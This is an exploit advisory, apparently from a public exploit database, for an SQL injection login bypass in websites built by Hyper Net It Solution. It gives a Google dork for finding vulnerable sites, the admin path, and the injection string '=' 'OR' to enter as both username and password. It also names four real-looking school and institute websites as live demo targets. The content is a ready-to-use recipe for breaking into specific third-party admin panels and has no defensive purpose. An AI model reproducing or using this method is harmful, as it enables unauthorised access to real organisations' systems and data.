Hyper Net It Solution admin page bypass

2016.06.22

Credit: 504w

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:"Developed by Hyper Net It Solution"

######################
# Exploit Title : Hyper Net It Solution admin page bypass
# Exploit Author : 504w
# Vendor Homepage : www.hypernetsolution.com
# Google Dork : intext:"Developed by Hyper Net It Solution"
# Date: 2016/06/22
# Tested On : win 8.1
# Contact:wh.504w@gmail.com
######################
# Vulnerable File : index.php
# Describe : Search dork and select Target. Put /admin/index.php After
url such as :
# http://site.com/admin/index.php
# Now enter fill (username) and (Password) like the information below :
# username : '=' 'OR'
# password : '=' 'OR'
#
# OK :)
#
# Demo :
# http://madhavpublicschool.org/admin/index.php
# http://smdmahavidyalaya.org/admin/index.php
# http://svnmvedu.in/admin/index.php
# http://mgpiti.com/admin/index.php
#
#
######################
# discovered by : 504w
# Special TnX to : Ali_cg2
# Website : Sec-learning.org
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Hyper Net It Solution admin page bypass

Dork: intext:"Developed by Hyper Net It Solution"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.